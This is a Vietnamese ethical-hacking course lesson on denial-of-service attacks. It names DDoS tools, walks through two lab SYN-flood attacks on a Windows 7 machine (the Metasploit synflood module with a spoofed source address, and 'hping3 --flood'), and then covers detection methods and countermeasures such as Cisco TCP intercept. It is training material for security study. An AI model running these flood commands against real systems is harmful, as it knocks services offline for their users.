10.2 Từ chối dịch vụ - Công cụ tấn công DoS/DDoS, tấn công tràn SYN bằng Metasploit & Hping3
Certified Ethical Hacker v10 Vietnamese
Kteam
Danh sách bài học
10.2 Từ chối dịch vụ - Công cụ tấn công DoS/DDoS, tấn công tràn SYN bằng Metasploit & Hping3
Công cụ tấn công DoS/DDoS
Toolkit Pandora DDoS Bot
Công cụ này được phát triển bởi một người Nga “Sokol”, người từng phát triển toolkit Dirt Jumper. Toolkit Pandora DDoS Bot có thể tạo ra năm loại tấn công bao gồm tấn công cơ sở hạ tầng và tấn công tầng ứng dụng:
- HHTP
- HHTP Download
- HTTP Combo
- Socket Connect
- Max Flood
Các công cụ tấn công DDoS khác:
- Derail
- HOIC
- DoS HTTP
- BanglaDos
Công cụ tấn công DoS và DDoS cho điện thoại
- AnDOSid
- Low Orbit Ion Cannon (LOIC)
Lab 10-1: Tấn công tràn SYN bằng Metasploit
Case Study
Ở đây, chúng ta sẽ sử dụng Kali Linux để tấn công tràn SYN trên máy Windows 7 (10.10.50.202) bằng Metasploit Framework). Chúng ta cũng dùng bộ lọc Wireshark để kiểm tra gói tin trên máy nạn nhân.
Quy trình
- Mở Kali Linux Terminal.
- Nhập lệnh dưới để quét port 21.
nmap –p 21 10.10.50.202
Port 21 mở, đã được lọc.
- Nhập lệnh “msfconsole” để khởi chạy Metasploit framework root@kali:~#msfconsole.
- Nhập dòng lệnh “use auxiliary/dos/tcp/synflood” msf> use auxiliary/dos/tcp/synflood
- Nhập dòng lệnh “show options” msf auxiliary(dos/tcp/synflood) > show options
Kết quả cho thấy thiết lập mặc định và thông số bắt buộc.
- Nhập các dòng lệnh sau:
msf auxiliary(dos/tcp/synflood) > set RHOST 10.10.50.202
msf auxiliary(dos/tcp/synflood) > set RPORT 21
msf auxiliary(dos/tcp/synflood) > set SHOST 10.0.0.1
msf auxiliary(dos/tcp/synflood) > set TIMEOUT 30000
- Nhập dòng lệnh “exploit” msf auxiliary(dos/tcp/synflood) > exploit
Tấn công tràn SYN được bắt đầu.
- Đăng nhập vào máy Windows 7 (nạn nhân).
- Mở Task Manager và quan sát biểu đồ hoạt động.
- Mở Wireshark và chuyển bộ lọc thành TCP cho những gói tin cần lọc.
Lab 10-2: Tấn công tràn SYN bằng Hping3
Case Study
Ở đây, chúng ta sẽ sử dụng Kali Linux để tấn công tràn SYN trên máy Windows 7 (10.10.50.202) bằng lệnh Hping3. Chúng ta cũng dùng bộ lọc Wireshark để kiểm tra gói tin trên máy nạn nhân.
Quy trình
- Mở Kali Linux Terminal.
- Nhập lệnh “hping3 10.10.50.202 --flood”
root@kali:~# hping3 10.10.50.202 –flood
- Mở máy Windows 7 và thu thập gói tin.
- Ứng dụng Wireshark có thể không phản hồi.
Phương pháp đối phó
Kĩ thuật phát hiện
Có nhiều cách để phát hiện và phòng tránh tấn công DoS/DDoS. Dưới đây là những phương pháp bảo mật phổ biến:
Profile hoạt động
Kĩ thuật này bao gồm quan sát các hoạt động diễn ra trên mạng hay hệ thống. Bằng cách quan sát và phân tích thông tin header của gói tin như TCP Sync, UDP, ICMP và giao thông netflow, chúng ta có thể quan sát tấn công DoS/DDoS. Profile hoạt động được đo nhờ so sánh nó với lưu lượng giao thông trung bình của mạng.
Phân tích wavelet
Đây là một quy trình tự động phát hiện tấn công DoS/DDoS qua phân tích dấu hiệu đầu vào. Cơ chế phát hiện tự động hóa này được dùng để phát hiện những bất thường về lưu lượng. Phân tích wavelet đánh giá giao thông và bộ lọc trên một phạm vi nhất định trong khi kĩ thuật Adaptive threshold dùng để phát hiện tấn công DoS.
Phát hiện điểm thay đổi tuần tự
Phát hiện điểm thay đổi là một thuật toán dùng để phát hiện tấn công từ chối dịch vụ. Kĩ thuật này sử dụng thuật toán tính tổng lũy tính không thông số để phát hiện bất thường. Phát hiện điểm thay đổi yêu cầu rất ít chi phí dùng máy điện toán nên hiệu quả và độ chính xác cao.
Chiến thuật đối phó DoS/DDoS
Biện pháp đối phó tấn công DDoS
- Bảo vệ nạn nhân thứ cấp
- Phát hiện và trung hòa handler
- Kích hoạt bộ lọc đầu ra và đầu vào
- Làm chệch hướng tấn công bằng cách hướng nó đến honeypot
- Giảm thiểu tấn công bằng cân bằng tải
- Vô hiệu hóa dịch vụ không cần thiết
- Sử dụng anti-malware
- Kích hoạt điều khiển bộ định tuyến
- Sử dụng proxy đảo ngược
- Hấp thụ tấn công
- Hệ thống phát hiện xâm nhập
Kĩ thuật đối phó Botnet
Bộ lọc RFC 3704
RFC 3704 được phát triển để lọc đầu vào cho mạng đa chủ, qua đó giảm thiểu tấn công DDoS. Nó từ chối trao quyền truy cập cho giao thông với địa chỉ giả và đảm bảo theo dõi đến địa chỉ nguồn của nó.
Bộ lọc nguồn IP uy tín
Tính năng lọc nguồn IP uy tín được Cisco IPS đảm bảo lọc giao thông dựa trên điểm uy tín và nhiều yếu tố khác. Thiết bị IPS thu thập thông tin thực từ mạng cơ sở cảm biến. Tính năng tương quan toàn cầu của thiết bị giúp máy tính cập nhật và các mối nguy cơ đã biết như botnet và malware để có thể phát hiện nhưng nguy cơ nâng cao, mới. Những cập nhật này thường được tải về trên IPS và các thiết bị tường lửa của Cisco.
Bộ lọc hố đen
Đây là quá trình ngừng giao thông ngầm (giao thông vào hoặc ra) để nguồn không phát hiện sự loại trừ gói tin. Bộ lọc hố đen kích hoạt từ xa (RTBHF), một kĩ thuật định tuyến, được dùng để giảm thiểu tấn công DoS bằng giao thức định tuyến BGB (Border Gateway Protocol). Bộ định tuyến thực hiện lọc hố đen qua giao diện null o. Ngoài ra, kĩ thuật này cũng có thể thực hiện kết hợp với BGB hoặc thiết lập một giao diện null o.
Kích hoạt chặn bắt TCP trên phần mềm Cisco IOS
Lệnh chặn bắt TCP dùng trên bộ định tuyến Cisco IOS để bảo vệ TCP server khỏi tấn công tràn TCP. Tính năng này ngăn chặn tấn công bằng cách chặn bắt hoặc xác nhận kết nối TCP hợp lệ. Gói tin TCP đồng bộ hóa ở đầu vào được so sánh trong danh sách truy cập mở rộng. Phần mềm chặn bắt TCP phản hồi với yêu cầu kết nối TCP với client dướ danh nghĩa server đích. Nếu kết nối thành công, nó bắt đầu session với server đích như một client và ngầm gắn hai kết nối với nhau. Do đó, tấn công tràn SYN sẽ không thể tới server đích.
Thiết lập lệnh chặn bắt TCP trên bộ định tuyến Cisco IOS
Router(config)# access-list <access-list-number> {deny | permit} TCP any <destination> <destination-wildcard>
Router(config)# access-list 101 permit TCP any 192.168.1.0 0.0.0.255
Router(config)# ip tcp intercept list access-list-number
Router(config)# ip tcp intercept list 101
Router(config)# ip tcp intercept mode {intercept | watch}
Mind map
Tải xuống
Tài liệu
Nhằm phục vụ mục đích học tập Offline của cộng đồng, Kteam hỗ trợ tính năng lưu trữ nội dung bài học 10.2 Từ chối dịch vụ - Công cụ tấn công DoS/DDoS, tấn công tràn SYN bằng Metasploit & Hping3 dưới dạng file PDF trong link bên dưới.
Ngoài ra, bạn cũng có thể tìm thấy các tài liệu được đóng góp từ cộng đồng ở mục TÀI LIỆU trên thư viện Howkteam.com
Đừng quên like và share để ủng hộ Kteam và tác giả nhé!
Thảo luận
Nếu bạn có bất kỳ khó khăn hay thắc mắc gì về khóa học, đừng ngần ngại đặt câu hỏi trong phần bên dưới hoặc trong mục HỎI & ĐÁP trên thư viện Howkteam.com để nhận được sự hỗ trợ từ cộng đồng.
Nội dung bài viết
Tác giả/Dịch giả
Khóa học
Certified Ethical Hacker v10 Vietnamese
Certified Ethical Hacker v10 Vietnamese
Dạ, không biết tới khi nào thì tiếp tục series CEH v10 vietnamese này ạ?
Hiện tại kinh phí cho bản dịch đã hết, bản dịch tạm thời sẽ dừng lại ở chương 10 để chỉnh sửa hoàn thiện các bản dịch trở về trước các chương còn lại sẽ được tiếp tục lại sớm nhất vào cuối năm nay. Cảm ơn các bạn đọc đã theo dõi bản dịch CEHv10 tiếng việt.